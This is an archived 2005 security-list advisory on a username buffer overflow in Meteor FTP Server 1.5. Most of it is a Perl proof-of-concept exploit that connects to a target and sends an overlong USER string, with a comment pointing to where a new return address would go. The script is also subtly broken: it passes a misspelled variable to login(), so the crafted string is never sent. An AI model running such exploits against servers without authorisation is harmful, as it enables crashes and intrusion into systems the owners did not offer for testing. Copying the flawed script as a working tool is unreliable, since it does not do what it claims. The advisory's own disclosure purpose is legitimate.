[EXPL] Meteor FTP Server Buffer Overflow (username)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/29/05

  • Next message: SecuriTeam: "[NT] Avast Antivirus Device Driver Memory Overwriting Vulnerability"
    To: list@securiteam.com
    Date: 29 May 2005 19:06:11 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Meteor FTP Server Buffer Overflow (username)
    ------------------------------------------------------------------------

    SUMMARY

    Meteor FTP is "a personal FTP server designed for the Microsoft Windows 98
    and Windows Millennium Edition operating systems".

    A buffer overflow vulnerability exists in Meteor FTP Server's handling of
    the username parameter, the following exploit code can be used to
    determine whether your version of Meteor FTP server is vulnerable or not.

    DETAILS

    Vulnerable Systems:
     * Meteor FTP Server version 1.5

    #!/usr/bin/perl
    #
    # 47meteor_bof.pl - PoC exploit for Meteor FTP Server
    # version 1.5
    # bug found by Anix44@gmail.com
    #
    # coded by k0r0l from acolytez team
    # visit http://acolytez.com for details
    #

    use Net::FTP;

    # geting data
    $host = @ARGV[0];
    $port = @ARGV[1];
    $debug = @ARGV[2];
    # ===========

    $ftp_error = "Unable";

    if (($host) && ($port))
    {
        # make exploit string
        $exploit_string = "USER ";
        $exploit_string .= "X"x80;
        #$exploit_string .= "\n\n\n\n"; - it will be new return point !
        # ===================
       
        print "Trying to connect to $host:$port\n";
        $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug =>
        $debug) or die "[-] Connection failed\n";
        print "[+] Connect OK!\n";
        print "Sending string...\n";
        $sock->login($exploit_sting, "testpassword");
        $answer = $sock->message;
        if ($answer =~ m/$ftp_error/i)
        {
            print "\n[-] Sorry! Failed\n";
        } else
        {
            print "\n[+] Send ok!\nServer can be explorated!\n\n";
        }
    }
    else
    {
        print "\nMeteor FTP Server - PoC Exploit\n
    http://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
    }

    ADDITIONAL INFORMATION

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Avast Antivirus Device Driver Memory Overwriting Vulnerability"

    Relevant Pages

    • [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by default. ... permissions and thus granted all local users the privilege to execute the ...
      (Securiteam)
    • [UNIX] SCO Multiple Local Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Local exploitation of a buffer overflow vulnerability in the ppp binary, ... allows attackers to gain root privileges. ...
      (Securiteam)
    • [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ...
      (Securiteam)
    • [UNIX] Tikiwiki Command Injection and Arbitrary File Exposure Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Two security vulnerabilities have been recently discovered in Tikiwiki, ... Remote exploitation of an input validation vulnerability in Tikiwiki ... allows attackers to gain access to arbitrary files on the vulnerable ...
      (Securiteam)
    • [NT] Ipswitch Multiple Vulnerabilities (IMail IMAP LIST Command DoS, Collaboration Suite SMTP Format
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Ipswitch Multiple Vulnerabilities (IMail IMAP LIST Command DoS, ... Collaboration Suite SMTP Format String) ... Remote exploitation of a denial of service vulnerability in Ipswitch ...
      (Securiteam)